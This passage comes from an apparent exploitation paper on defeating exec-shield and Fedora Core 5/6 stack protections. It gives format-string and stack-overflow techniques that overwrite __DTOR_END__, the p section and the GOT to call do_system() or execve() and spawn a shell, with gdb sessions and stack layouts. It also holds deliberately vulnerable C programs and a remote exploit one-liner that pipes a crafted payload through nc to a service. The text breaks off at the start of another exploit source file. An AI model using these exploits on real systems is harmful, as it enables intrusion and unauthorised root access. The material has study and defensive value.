sh-3.1# gcc -o shell shell.c
sh-3.1# ln -s shell `printf "\xa1\xb4\x95\x04\x08\x8b\x10\x85\xd2\x75\xeb\xc6\x05\xb8\x95\x04\x08
\x01\xc9\xc3\x90\x55\x89\xe5\x83\xec\x08\xa1\xc4\x94\x04\x08\x85\xc0\x74\x12\xb8"`

We can symlink _do_system_dtors_aux() + frame_dummy() function code that we
looked through gdb as a command. This technique is also highly useful when
you try to exploit real application. More details are in the example code.


----[ 4.5 - Changing __DTOR_END__ location (overwriting p section)

  There is a problem when you call __do_global_dtors_aux() function mentioned
at 4.2. It can overwrite some memory areas that hold critical information
when you call the function many times. It is true that these overwritten
heap area always can have data entry structure and some critical information.
Thus, it is difficult to call functions many times freely. Actually, there is
some section tables after __DTORS_END__ section as you see below.


...
+-------------------------+
|      __DTOR_END__       |
+-------------------------+
|      __JCR_LIST__       |
+-------------------------+
|        _DYNAMIC         |
+-------------------------+
|  _GLOBAL_OFFSET_TABLE_  |
+-------------------------+
|       data_start        |
+-------------------------+
...

If you repeat more __do_global_dtors_aux() function to search information in
stack, the chance of overwriting important entry such as
_GLOBAL_OFFSET_TABLE_ will be greater. This eventually causes some bad effect
to program flow
               
The technique we are going to talk about is to use empty space on heap by
changing the position of section arbitrarily not by using particular
__DTOR_END__ section that declared while compile. Let's look at
__do_global_dtors_aux() again.


Fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <__do_global_dtors_aux+6>:   cmpb   $0x0,0x8049574 (1) check whether 0x8049574 is 0
        <__do_global_dtors_aux+13>:  je     0x804831b <__do_global_dtors_aux+27>
        <__do_global_dtors_aux+15>:  jmp    0x804832d <__do_global_dtors_aux+45>
        <__do_global_dtors_aux+17>:  add    $0x4,%eax
        <__do_global_dtors_aux+20>:  mov    %eax,0x8049570 (3) save 4bytes added %eax into 0x8049570
        <__do_global_dtors_aux+25>:  call   *%edx
        <__do_global_dtors_aux+27>:  mov    0x8049570,%eax (2) copy the value in 0x8049570 to %eax
        <__do_global_dtors_aux+32>:  mov    (%eax),%edx
        <__do_global_dtors_aux+34>:  test   %edx,%edx
        <__do_global_dtors_aux+36>:  jne    0x8048311 <__do_global_dtors_aux+17>

The first procedure is comparing 0x08049574 with 0. This section is completed
section and has NULL value naturally. Then save the value inside 0x8049570 to
%eax register. This is p section which has the address of __DTOR_END__
section. In short, %eax register now has __DTOR_END__ section address.
Finally, copy %eax register + 4 addresses to p section.

Now, we can change the position of __DTOR_END__ section anywhere we want.
Attack process will be like this:

(1) Copy the content of p section into empty space in heap.

(2) Overwrite p section+4 (completed section) with null to evade comparison.

(3) Allocate a function that you want to call to empty space in heap


(gdb) br __do_global_dtors_aux
...
(gdb) x/8 0x08049800 ; empty space in heap
0x8049800:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049810:      0x00000000      0x00000000      0x00000000      0x00000000
(gdb) c
Continuing.

Breakpoint 2, 0x08048306 in __do_global_dtors_aux ()
(gdb) set *0x08049800=0x828282
(gdb) x 0x08049800
0x8049800:      0x00828282        ; input garbage value into fake __DTOR_END__ address
(gdb) set *0x8049570=0x08049800
(gdb) x 0x8049570
0x8049570:      0x08049800        ; Change the content of p section
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00828282 in ?? ()
(gdb)

It is not a hard job to insert desired value into some place when you do
format string attack.

Unfortunately, do_system() function format string attack mentioned at
chapter 4.1 must use __DTOR_END__ section to exploit. So, it was impossible
to attack till the program is re-compiled if __DTOR_END__ section had
terminator character, null character and special character.

But, the p section changing skill that we just talked about doesn't need
__DTOR_END__ changed. It makes __DTOR_END__ section where you want. Thus, you
can exploit the system without any trouble. Look example code to find more.


----[ 4.6 - Format string in classic shellcode library area

  This is not an efficient attack technique but I want to talk about this
because I want to prove that shellcode is still executable through library
area. The core of this technique is overwriting shellcode on library area by
using format string technique.

To make this work, you should enter library address with null into
environment variable or argument and brute-force the changing memory address
by $-flag.

These are the attack procedure:

(1) Find useable library address.
(2) Input the library address which is for under 16mb as a program argument
    and find stack by using $-flag
(3) Enter little shellcode into library by format string technique
(4) Overwrite the library address that holds shellcode with __DTOR_END__
    address of the target program.

These are the exploit procedure:

(1) Find $-flag value to overwrite __DTOR_END__ section with certain value.
(2) Find $-flag value to overwrite Shellcode into library address.
(3) Get library address and __DTOR_END__ address needed for attack.
(4) The address of __DTOR_END__ and format string code that overwrites
    shellcode on somewhere in library, and format string code that overwrites
    shellcode's address on __DTOR_END__'s address are going into the first
    argument. And since second argument, library addresses are saved.
(5) Try to attack with increasing PAD value to correct the align with library
    address we input continually.

Find more in example code.


----[ 4.7 - Example code

  We have seen a few possible technique of format string under exec-shield
environment. Some of appendix code at chapter 6 is to prove those 4 attack
skills I have mentioned.

First, 0x82-remote_do_system.sh script provided at chapter 6.5 is about the
remote attack technique mentioned at chapter 4.1. Second,
0x82-p_section_overwrite.c code at 6.6 is for __do_global_dtors_aux() +
setuid() + do_system() attack at 4.3 and p section overwrite at 4.5. Third,
0x82-dtors_execv_ex.c at 6.7 is about the __do_global_dtors_aux() +
exec family attack technique mentioned at 4.4. Finally, Shellcode attack code
at 4.6 is shown at 6.8 0x82-library_terror/part_one.c,
0x82-library_terror/part_two.c



--[ 5 - How to exploit since Fedora Core 5 system

  Those vulnerabilities that I am going to tell you through chapter 5.1 and
5.2 do not seem realistic. I mean , there is almost no chance to occur these
vulnerabilities. Because only the prolog and epilog of the main() have been
changed. It seems like rough mixture of StackGuard and Stackshield(7.6).
On the other hands, at chapter 5.3 we are going to see moving stack pointer
over 4bytes which is mentioned at chapter 3.1 and also can be efficient when
you do overflow attack on real application at remote.


----[ 5.1 - Changes on main() function prolog and epilog

  Basic algorithm is pretty similar to StackShield. But it keeps return
address in stack not in heap, and puts %ecx register which does similar job
with canary of StackGuard near frame pointer to prevent the return address
from alteration.


* Changed main() prolog since Fedora core 5:

(1)        lea    0x4(%esp),%ecx
(2)        and    $0xfffffff0,%esp
(3)        pushl  0xfffffffc(%ecx)
(4)        push   %ebp                ; prolog of normal main()
(5)        mov    %esp,%ebp
(6)        push   %ecx

(1) Insert address of %esp+4 into %ecx register.
(2) Change %esp register address by doing "and" calculation. (%esp & -16)
(3) Save return address at %ecx - 4 in recent stack.
(4) Save %esp register of previous function in recent stack.
(5) Set frame pointer for main() by duplicating %esp into %ebp.
(6) Save %ecx register in recent stack and make it does same role with canary.

After all these process stack will be:


^
| Address grows this way
...
+------------------------------------+ <- Original %esp register address: procedure (1)             |
| __libc_start_main() return address |                                                              |
+------------------------------------+                                                              |  
|                 ...                |                                                              |
+------------------------------------+ <- %esp register moved by procedure (2)                      |
| __libc_start_main() return address | <- %ecx -4 saved by procedure (3)                            |
+------------------------------------+                                                              |
|    previous base frame pointer     | <- %ebp register of previouse function save by procedure (4) |
+------------------------------------+ <- %ebp register moved by procedure (5)                      |
|           %ecx register            | <- %ecx register saved by procedure (6)                      |
+------------------------------------+ <- %esp register after all those 6 procedures                |
...                                                                                                 V
| Stack grows this way
V

These are the eplilog procedures.


Epilog of main() since F/C 5:

(1)        pop    %ecx
(2)        pop    %ebp
(3)        lea    0xfffffffc(%ecx),%esp
(4)        ret

(1) Pop %ecx register from stack.
(2) Pop %ebp (previous base frame pointer) from stack.
(3) Move %esp register to original return address by putting %ecx - 4 address
    in %esp.
(4) Go back to __libc_start_main() function when %eip is popped by ret command.

In short, it is impossible to change return address with ordinary stack
overflow because of %ecx register which does the same role with canary.


----[ 5.2 - Exploit by using off-by-one exploit with %ecx register

  Because It is extremely difficult to guess %ecx register, we overwrite the
last 1byte with NULL. Now, we need to enter address which will be return
address into %ecx-4 whose 1byte has been changed into null. It is similar to
frame pointer that changes return address indirectly. (7.5)

Enter ret code from address will be return address to 4byte before the end
of usable space. And make the last 4byte to execute main() epilog twice.
We execute epilog one more time because it moves %esp register near argument
pointer and environment variable pointer. (Similar concept mentioned at
chapter 3.4)

By making %ecx register to have environment variable pointer when it is
restored on main() epilog, we can make %ecx-4 which is the position of %esp
register be declared environment variable code.

Brief of attack is below.


Making attack code:

Fill all local variable but last 4byte with ret code. By doing so, we can
make return address ret code address by %ecx register off-by-one technique.
If we make stack like the picture below, We can do main() epilog twice and
call execve() function refer to the environment variable below.

^
| Stack grows this way
...
+-------------------+
|   ret(pop %eip)   |: Fill overflowed local variable with
+-------------------+
|   ret(pop %eip)   |
+-------------------+
|   ret(pop %eip)   |
+-------------------+
|   ret(pop %eip)   |
+-------------------+
|   ret(pop %eip)   |: (2) Pop %eip from forged %ecx - 4
+-------------------+ <<----------------------------------------------------------------+
|   ret(pop %eip)   |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|   ret(pop %eip)   |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|   ret(pop %eip)   |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|        ...        |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|   main() epilog   |: (4) recall epilog of main().            ----------------------+  |
+-------------------+                                                                |  |
|    0x??????00     |: (1) The last byte of %ecx register become null, --------------+--+
+-------------------+                                                                |
|        ...        |                                                                |
+-------------------+                                                                |
| argument0 pointer |: argument pointer starts here.                                 |
+-------------------+                                                                |
| argument1 pointer |                                                                |
+-------------------+                                                                |
| null(0x00000000)  |: argument pointer ends here.                                   |
+-------------------+                                                                |
| environ0 pointer  |: environment variable pointer starts here.                     |
+-------------------+                                                                |
| environ1 pointer  |                                                                |
+-------------------+                                                                |
| environ2 pointer  |                                                                |
+-------------------+                                                                |
| environ3 pointer  |                                                                |
+-------------------+                                                                |
|        ...        |                                                                |
+-------------------+                                                                |
| environ25 pointer |                                                                |
+-------------------+: 27th environment variable pointer                             |
| environ26 pointer | <<-------------------------------------------------------------+
+-------------------+: (5) pop %ecx into forged %esp register. ----------------------------+
| environ27 pointer |                                                                      |
+-------------------+                                                                      |
|        ...        |                                                                      |
+-------------------+                                                                      |
...                                                                                        |
| stack grows this way                                                                     |
V                                                                                          |
                                                                                           |
Making environment variables:                                                              |
                                                                                           |
Let's say there is a stack overflow vulnerability in a program that uses                   |
array size of 256. in this case, when we call main() epilog continually %ecx               |
register points 27th environment variable¡¯s address. It recognizes %ecx-4                 |
as a return address, so 27th env variable -4 which means 26th env variable                 |
will be considered as a return address. You can see there is execve() at the               |
position of 26th env variable.                                                             |
                                                                                           |
...                                                                                        |
+------------------+                                                                       |
|   execve() addr  |: execve() function address (26th env variable which will be %ecx - 4) |
+------------------+                                                                       |
|      "XXXX"      |: 4byte dummy (27th env variable: environ26) <<------------------------+
+------------------+
|  "/bin/sh" addr  |: will be the first argument of execve() (input "sh" address in library)
+------------------+
|       '\0'       |: will be the second argument of execve() (0x00000000)
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |: will be the third argument of execve() (0x00000000)
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
...

Execution of shellcode through exeve() and environment variable pointer is
similar to the technique mentioned at 3.4. Find more in example code.


----[ 5.3 - Overflow exploit overwriting __DTOR_END__ section

  On this chapter, we are going to talk about getting shell by overflow
since F/C 5. If you could not find a good condition to
attack with only ret code, then you should look this chapter.

We can move stack pointer by %esp register moving technique at chapter 3.1.


fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <__libc_csu_init>:
        ...
        add    $0x1c,%esp
        pop    %ebx
        pop    %esi
        pop    %edi                ; move %esp 12bytes from here
        pop    %ebp
        ret ; pop %eip

        <__do_global_ctors_aux>:
        ...
        add    $0x4,%esp
        pop    %ebx                ; move %esp 12bytes from here
        pop    %ebp
        ret ; pop %eip

The main idea of this chapter is deeply related to multiple calling of copy
function from Nergal(7.7). It is a technique that puts address of function that
you desire to execute(such as system function, do_system function and exec family)
into __DTOR_END__ like format string attack.

First, we will see attack through do_system function. This technique doesn't
use stack at all. On the others hands, system function and exec family function
need to use stack to attack the system.  

Attack process of do_system() function:

(1) Find 1byte of address of do_system() function and sh string from program.
    And enter them in __DTOR_END__ section.

(2) Develop the way to move %esp by 12bytes by using plt copy function,
    __do_global_ctors_aux() function epilog, and the address we found
    previously. Eventually, these codes are used for copying do_system()
    address and  "sh" string to __DTOR_END__ section.


<- Stack grows this way                                              Address grows this way  ->
+------------+------+-----------+-----------+------------+------+-----------+-----------+-----+
| strcpy plt | eplg | func_arg1 | func_arg2 | strcpy plt | eplg | func_arg1 | func_arg2 | ... |
+------------+------+-----------+-----------+------------+------+-----------+-----------+-----+
                  ^                                        ^
                  |                                        |
                  +----------------------------------------+
                   __do_global_ctors_aux()'s epilog (12byte)

(3) After making copy function, make %eip register that popped last have the
    address of __do_global_dtors_aux() function address. if you execute
    __do_global_dtors_aux() like this, do_system() copied to __DTOR_END__
    section would be called by command "call *%edx" and, finally,  will spawn
    a shell.

More details are below:


fedora core 6 glibc 2.5, gcc 4.1.1-30:

Making attack code:

We will call strcpy() (copy function) several times by using 12byte %esp
move technique. Finding 1byte for each do_system() function address and
"sh" string in heap is still bugging but not a big deal.

^
| Stack grows this way
...
+--------------------------------+
|             buffer             |: overflowed local variables
+--------------------------------+
|          strcpy() plt          |: Get by ascii-armor by calling plt copy function
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+0          |
+--------------------------------+
|     (&do_system()>>0)&0xff     |: 1byte of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+1          |
+--------------------------------+
|     (&do_system()>>8)&0xff     |: 1byte of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+2          |
+--------------------------------+
|    (&do_system()>>16)&0xff     |: 1byte of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+3          |
+--------------------------------+
|    (&do_system()>>24)&0xff     |: 1byte of null of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+4          |
+--------------------------------+
|              's'               |: 1byte of 'sh' string found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+5          |
+--------------------------------+
|              'h'               |: 1byte of 'sh' string found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+6          |
+--------------------------------+
|           null(0x00)           |: 1byte null found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+7          |
+--------------------------------+
|           null(0x00)           |: 1byte null found in program's text area
+--------------------------------+
|    __do_global_dtors_aux()     |: called by ret(pop %eip) code
+--------------------------------+
...
| Address grows this way
V

Buffer will be like this when the attack succeeds:

Result of debugging fedora core 6 glibc 2.5, gcc 4.1.1-30 exploit:

(gdb) br *do_system
Breakpoint 1 at 0xb517d0
(gdb) r
...
Breakpoint 1, 0x001457d0 in do_system () from /lib/libc.so.6
(gdb) print do_system
$1 = {<text variable, no debug info>} 0x1457d0 <do_system>
(gdb) x &__JCR_LIST__-1
0x80494c8 <__DTOR_END__>:       0x001457d0                ; do_system() function address
(gdb)
0x80494cc <__JCR_LIST__>:       0x00006873                ; 'sh' string
(gdb)
0x80494d0 <_DYNAMIC>:   0x00000001
(gdb)
0x80494d4 <_DYNAMIC+4>: 0x00000010
(gdb) x $eax
0x80494cc <__JCR_LIST__>:       0x00006873
(gdb)

This time, we will talk about attack technique which uses system function
and exec family function. These functions need stack to do their job.

Attack Process:

(1) Find 1byte of address of function that you wish to run. This 1byte
    will be entered into __DTOR_END__ section.

(2) As I mentioned before, copy the function address to __DTOR_END__ section
    by using plt function and moving %esp by 12bytes. At this moment, you
    can create desired command on heap ,just like do_system() attack, or
    you also can attack only using symlink.

(3) Let the %eip register popped last have address right after
    __do_global_dtor_aux() function prolog. This will help stack pointer to
    be the same and we can make function argument easily because of this.



fedora core 6 glibc 2.5, gcc 4.1.1-30:

Making attack code:

It uses same technique with moving %esp by 12bytes previously introduced.
It calls strcpy() function several times. This function will find 1byte of
'sh' string and 1byte of address of execve() function from heap and copy this.


^
| Stack grows this way
...
+--------------------------------+
|             buffer             |: Will be overflowed local variable
+--------------------------------+
|          strcpy() plt          |: Get by ascii-armor by using plt call.
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+0         |: dest
+--------------------------------+
|       (&execve()>>0)&0xff      |: src - 1byte of execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+1         |
+--------------------------------+
|       (&execve()>>8)&0xff      |: 1byte of execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+2         |
+--------------------------------+
|      (&execve()>>16)&0xff      |: 1byte of execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+3         |
+--------------------------------+
|      (&execve()>>24)&0xff      |: 1byte of null in execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+4         |
+--------------------------------+
|              's'               |: 1byte of 'sh' string found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+5         |
+--------------------------------+
|              'h'               |: 1byte of 'sh' string found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() eiplog |
+--------------------------------+
|         __DTOR_END__+6         |
+--------------------------------+
|            null(0x00)          |: 1byte of null found from text area of the program
+--------------------------------+
|   __do_global_dtors_aux()+6    |: Address right after __do_global_dtors_aux() prolog
+--------------------------------+
|     address of 'sh' string     |: the first argument of execve()
+--------------------------------+
| any null value address on heap |: the second argument of execve()
+--------------------------------+
| any null value address on heap |: the third argument of execve()
+--------------------------------+
...
| Address grows this way
V

After attack buffer will be like this:

Debug report of fedora core 6 glibc 2.5, gcc 4.1.1-30 exploit:

(gdb) r
Starting program: /tmp/local_ex_test
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x0019dbff in ?? ()
(gdb) x 0x08049488
0x8049488:      0x0019dbff                ; Address of execve() overwritten on __DTOR_END__ section
(gdb)
0x804948c:      0x00006873                ; 'sh' string
(gdb)
0x8049490:      0x00000000
(gdb) x $eax
0x804948c:      0x00006873
(gdb) x $esp
0xbfe2810c:     0x0804831b
(gdb)
0xbfe28110:     0x0804948c                ; the first argument of execve()
(gdb)
0xbfe28114:     0x08048008                ; the second argument of execve()
(gdb)
0xbfe28118:     0x08048008                ; the third argument of execve()
(gdb) x 0x0804948c
0x804948c:      0x00006873
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb)

As we can control the stack pointer and the value, we can make arguments
of execve() as we want. In addition, "/bin/sh" code in library is located
at address under 16 mb ,so with some function that uses a few argument
such as system() it can be used for remote attack. exec family function can
copy 'sh' string on heap and symlink with a program to execute a shell
just like do_system() attack.

To make the exploit more adaptable to other systems, we may need to find
address of do_system() and "sh" string from ELF header or the starting of the
program's text area. Surely, the binaries compiled at similar environment
would have same static and same address.

Here is a little tip. If you want to attack a real application, then you
should look for these functions below. Names of these functions are listed
on heap, so you can get 'sh' string from that.


bdflush()
tcflush()
fflush()

[root@localhost src]# objdump -d cfingerd | grep '<fflush@plt>:'
08048ff0 <fflush@plt>:
[root@localhost src]# gdb in.cfingerd -q
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) x/s 0x08048705
0x8048705:       "__gmon_start__"
(gdb)
0x8048714:       "libc.so.6"
(gdb)
0x804871e:       "_IO_stdin_used"
(gdb)
0x804872d:       "socket"
(gdb)
0x8048734:       "fflush"
(gdb) x/s 0x8048738
0x8048738:       "sh"
(gdb)

Thus, we, now, can make highly adaptable exploit code for a specific
application. Refer example code for more details.


----[ 5.4 - Overflow exploit overwriting GLOBAL OFFESET TABLE

Technique on this chapter is similar to function execute skill at chapter 5.3.
When you cannot use _do_global_dtor_aux() function or you don't know
the address of both p section and __DTOR_END__, you can try this technique.

I will not talk details about plt and got. Our job is to find useful
stuff from inside of program and analyze that.
Generally, plt is made like this


fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <func@plt>:
        jmp *_GLOBAL_OFFSET_TABLE_
        push $n
        jmp _dl_runtime_resolve

If we call func's plt after changing its _GLOBAL_OFFSET_TABLE_ section to
execve(), it would be:


        jmp execve();

__do_global_dtors_aux() function stores its %eip register as a return address,
because the function uses "call execve()" command. But, on the contrary,
when you attack through GOT section, unlike call function, it doesn't store
return address as a stack pointer. So we need to insert 4bytes of dummy
on behalf of %eip register. It is a very small difference but also very
critical thing for a attacker to make arguments for related function.


fedora core 6 glibc 2.5, gcc 4.1.1-30:

Making attack code:

Change GOT section for __libc_start_main() with address of execve() function
by multiple plt calling. It is same as moving %esp by 12byte technique at
chapter 5.3. Anyway, It will execute desired function by referring
it's stack pointer when you call the function¡¯s plt.

^
| Stack grows this way
...
+--------------------------------------------+
|                strcpy() plt                |
+--------------------------------------------+
|       __do_global_ctors_aux() eiplog       |
+--------------------------------------------+
| __libc_start_main() _GLOBAL_OFFSET_TABLE+0 |
+--------------------------------------------+
|             (&execve()>>0)&0xff            |
+--------------------------------------------+
|                strcpy() plt                |
+--------------------------------------------+
|            ... abbreviation ...            |
+--------------------------------------------+
|          __libc_start_main() plt           |: __libc_start_main() function's plt
+--------------------------------------------+
|                dummy 4byte                 |: you must enter this because execve() function is called by jmp
+--------------------------------------------+
|             'sh' string address            |: the first argument of execve()
+--------------------------------------------+
|         Null value address on heap         |: the second argument of execve()
+--------------------------------------------+
|         Null value address on heap         |: the third argument of execve().
+--------------------------------------------+
...
| Address grows this way
V

After the attack buffer will be:

Debug report for fedora core 6 glibc 2.5, gcc 4.1.1-30 exploit:

(gdb) r
Starting program: /tmp/local_ex_test
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x0019dbff in ?? ()
(gdb) x 0x08049570
0x8049570:      0x0019dbff                ; execve() function address overwritten on __libc_start_main GOT section
(gdb)
0x8049574:      0x00006873                ; 'sh' string
(gdb) x $esp
0xbfa3b520:     0x82828282                ; dummy 4byte
(gdb)
0xbfa3b524:     0x08049574                ; the first argument of execve()
(gdb)
0xbfa3b528:     0x08048008                ; the second argument of execve()
(gdb)
0xbfa3b52c:     0x08048008                ; the third argument of execve()
(gdb) x 0x08049574
0x8049574:      0x00006873
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb)


Compare to prior attack technique at chapter 5.3, there are some differences.
First, it changes GOT section to execve() function address. second, it uses
plt to jump to that function. third, it must have 4bytes of dummy value.
You can find more in example code.


----[ 5.5 - Example code

  I have mentioned several changes and exploit technique for that since
F/C 5. The appendix attached at chapter 6.9 is to prove the contents of
chapter 5.1. %ecx off-by-one exploit is 0x82-x_strcpy.c code provided at 6.9.
I have attached it with the debugging result please take a glance at that
too. Remote exploit code for chapter 5.3 is 0x82-remote_x_strcpy.c at 6.10.
0x82-local-x_execve.c code at chapter 6.11 is for execve exploit.
At last, 0x82-local_got_execve.c at chapter 6.12 is for GOT exploit at
chapter 5.4.



--[ 6 - Appendix

  Since this chapter I will try to show you some example codes to prove
what I have been saying from the start of this paper. I, sometimes, will put
some note on the code. These notes can be used for real exploit and also
can be JUST for Proof-of-Concept.


----[ 6.1 - ret(pop %eip) remote stack overflow exploit

  This is the code for POC 2006 conference. I didn't put enough effort and
time for this script. I admit it! This is very uncomfortable to debug.
It is only to test on F/C 3.

-- rvuln.c --
#include <stdio.h>

int main(int argc,char *argv[])
{
        char buf[8];
        gets(buf);
}
--

I have set rvuln program as a fido service deamon through setting xinetd.
below is simple exploit script.

-- 0x82-remote_ret.sh --
#!/bin/sh
#
# Remote ret(pop eip) exploit
# by Xpl017Elz
#
# 0x08048394 <main+44>:   ret
#

(printf "aaaabbbbx;sh\x94\x83\x04\x08\x94\x83\x04\x08\x94\x83\x04\x08\x94\x83\x04\x08\x94\x83\x04\
\x08\xc0\xc7\xee\xf6";cat) | nc localhost fido

#
# EOS
#
--

You can guess ret code from remote, or can find by doing this.

--
[x82@localhost tmp]$ objdump -d rvuln | grep ret
804828e:       c3                      ret
8048304:       c3                      ret
8048339:       c3                      ret
8048365:       c3                      ret
8048394:       c3                      ret
80483e9:       c3                      ret
804842d:       c3                      ret
8048453:       c3                      ret
804846d:       c3                      ret
[x82@localhost tmp]$
--


----[ 6.2 - ret(pop %eip) + symlink local stack overflow exploit

  This exploit code is tested on F/C 4. This can also attack F/C 5 and 6.
To test the code, The target program has to be setuid. (It doesn't matter
whether it is root or not)

-- vuln.c --
int main(int argc,char *argv[])
{
        char buf[256];
        strcpy(buf,argv[1]);

        return 0;
}
--

Attack code is below:

-- 0x82-break_FC4.c --
/*
**
** Code name: 0x82-break_FC4.c
** Description: Fedora Core Linux 4 based stack overflow ex